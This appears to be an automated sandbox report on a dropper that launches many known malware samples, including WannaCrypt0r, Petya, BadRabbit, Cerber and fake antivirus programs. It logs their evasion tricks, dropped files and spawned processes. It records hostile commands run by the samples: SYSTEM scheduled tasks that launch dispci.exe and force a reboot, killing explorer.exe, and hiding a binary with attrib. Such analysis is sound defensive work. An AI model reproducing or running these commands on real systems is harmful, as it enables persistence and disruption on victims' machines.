          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000402641 second address: 0000000000402604 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-0Ch], eax 0x00000005 mov dword ptr [ebp-08h], edx 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b sub eax, dword ptr [ebp-00000120h] 0x00000011 mov ecx, dword ptr [ebp-08h] 0x00000014 sbb ecx, dword ptr [ebp-0000011Ch] 0x0000001a leave 0x0000001b ret 0x0000001c mov esi, eax 0x0000001e call 00007FB820AF6693h 0x00000023 push ebp 0x00000024 mov ebp, esp 0x00000026 sub esp, 00000120h 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000401CE6 second address: 0000000000401C9C instructions: 0x00000000 rdtsc 0x00000002 sub eax, dword ptr [ebp-00000220h] 0x00000008 mov ecx, eax 0x0000000a add dword ptr [ebp-04h], ecx 0x0000000d jmp 00007FB8209E542Ah 0x0000000f mov eax, dword ptr [ebp-08h] 0x00000012 inc eax 0x00000013 mov dword ptr [ebp-08h], eax 0x00000016 mov eax, dword ptr [ebp-08h] 0x00000019 sub eax, 64h 0x0000001c je 00007FB8209E54EBh 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000401D54 second address: 0000000000401D0A instructions: 0x00000000 rdtsc 0x00000002 sub eax, dword ptr [ebp-00000220h] 0x00000008 mov ecx, eax 0x0000000a add dword ptr [ebp-04h], ecx 0x0000000d jmp 00007FB820AF669Ah 0x0000000f mov eax, dword ptr [ebp-08h] 0x00000012 inc eax 0x00000013 mov dword ptr [ebp-08h], eax 0x00000016 mov eax, dword ptr [ebp-08h] 0x00000019 sub eax, 64h 0x0000001c je 00007FB820AF675Bh 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\07bb0738.exe TID: 5256Thread sleep count: 81 > 30Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exe TID: 5256Thread sleep time: -81000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exe TID: 1296Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\302746537.exe TID: 3560Thread sleep count: 374 > 30
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe TID: 1756Thread sleep time: -330000s >= -30000s
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe TID: 5480Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000
          Source: C:\Windows\302746537.exeWindow / User API: threadDelayed 374
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@ViraLock.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@PCDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@LPS2019.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SE2011.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Xyeta.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Petya.A.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@VAV2008.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@NavaShield.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Fantom.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Krotten.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@PolyRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeEvaded block: after key decisiongraph_15-11223
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeAPI call chain: ExitProcess graph end nodegraph_15-10554
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeAPI call chain: ExitProcess graph end node
          Source: rundll32.exe, 00000016.00000002.472254033.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: rundll32.exe, 00000016.00000002.490069836.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.553421168.0000000004665000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Endermanch@Cerber5.exe, 00000017.00000003.497926104.00000000017E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\user\Desktop\ALP
          Source: 07bb0738.exe, 00000000.00000003.308010109.0000022E4F016000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\586F.tmpProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00405C10 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,15_2_00405C10
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_0040AE97 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,15_2_0040AE97
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_00405BD2 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,17_2_00405BD2
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_0040AE70 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,17_2_0040AE70
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00411585 LoadLibraryA,LoadLibraryA,LoadLibraryA,#17,LoadLibraryA,GetProcAddress,FreeLibrary,SHGetMalloc,15_2_00411585
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_0040A1EC GetProcessHeap,RtlAllocateHeap,15_2_0040A1EC
          Source: C:\Users\user\Desktop\07bb0738.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\586F.tmpProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\07bb0738.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.6 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.5 139
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\07bb0738.exe "C:\Users\user\Desktop\07bb0738.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe" Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\A00.tmp\302746537.bat" "
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: Endermanch@Antivirus.exe, 0000000E.00000000.354486231.00000000004AE000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: this threat from your PC.You are using a trial version.It is recommended to purchase a commercial version.""Wintrust.dllCryptCATAdminCalcHashFromFileHandleCryptCATAdminEnumCatalogFromHashCryptCATAdminAcquireContextCryptCATAdminReleaseContextCryptCATCatalogInfoFromContextWM_LINK_CLICKEDWM_LINK_CLICKEDUpdateThreadStopChecking Internet connection...Starting to download updates...avtr.datswverdbverdbsignsdbverfdbsignsfavt_db/customers%s%s/%sDownloading update 100%Software successfully updated.\avt.dbswverswverdbverdbverdbsignsdbsigns%.2fdbverf%ddbsignsfDatabase version: %.2fVirus Signatures: %dUpdate cancelled.Your software is up-to-date.Your software is up-to-date.LastUpdateDownloading update %d%%Check for updatesUpdate cancelled.LastUpdate%.2fdbverf%ddbsignsfDatabase version: %.2fVirus Signatures: %dYour software is up-to-date.Your software is up-to-date.Check for updatesWM_LINK_CLICKEDTrialTahomaTahomaCTransparentStaticCSystemTrayTaskbarCreatedTrayNotifyWndTrayClockWClassShell_TrayWndSupportTrebuchet MSTrebuchet MSTahomaTahomaTahomaTahomaE-mailSubjectMessageActivate Antivirus:
          Source: Endermanch@Antivirus.exe, 0000000E.00000000.354486231.00000000004AE000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: License.txt\"notepad.exe "SecStatus_3SecStatus_4SecStatus_5FDGUID%08d%08d%08dGUID%WINDIR%%SYSDIR%Data:%d:Dataavthook.dll_StartExplorerHook@8swver3.0swverdbver1.1dbverdbsigns62577dbsignsswverdbverdbsignsdbverf1.1dbverfdbsignsf62577dbsignsfdbverfdbsignsfsplash.mp3AntivirusPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGAntivirusWintrust.dllAntivirus_AntivirusgourlAntivirus (Unregistered version)httpgourlgourlEmailclick here to fix security problemsPNGPNGPNGPNG1-866 427 1693FDLicenseSecStatus_3SecStatus_4SecStatus_5Shell_TrayWndAVT_BASIC/customers%s%s/buy.php?pid=%s&id=%s&subid=%sAntivirusYour copy already registered!AVT_BASIC/customers%s%s/buy.php?pid=%s&id=%s&subid=%sEmail/customers%s%s/auth/login/email/%sEmail/customers%s%s/auth/login/email/%sAVT_BASICGUID/customers%s%s/auth/autologin/email/%s@user.com/pid/%sAntivirusFDShell_TrayWndWM_LINK_CLICKEDLocal AppWizard-Generated ApplicationsSettings_06e722db8-b319-4933-9932-314a077920be-noscanrt8RBtVR0f1tQq9ra
          Source: Endermanch@Antivirus.exe, 0000000E.00000000.354486231.00000000004AE000.00000002.00000001.01000000.00000008.sdmp, avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: Shell_TrayWnd
          Source: avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: )@Shell_TrayWnd
          Source: Endermanch@Antivirus.exe, 0000000E.00000000.354486231.00000000004AE000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Click "OK" to restart you computer now.AntivirusAll the found objects removed successfully!Shell_TrayWndButtonRAM checking available only for activated copy.
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: GetLocaleInfoA,15_2_0040A86C
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: GetLocaleInfoA,17_2_0040A845
          Source: C:\Users\user\Desktop\07bb0738.exeQueries volume information: C:\Users\user\Desktop\07bb0738.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeQueries volume information: C:\Users\user\Desktop\07bb0738.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Users\user\Desktop\Endermanch@DeriaLock.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: unknown VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Users\user\AppData\Local\6AdwCleaner.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe VolumeInformation
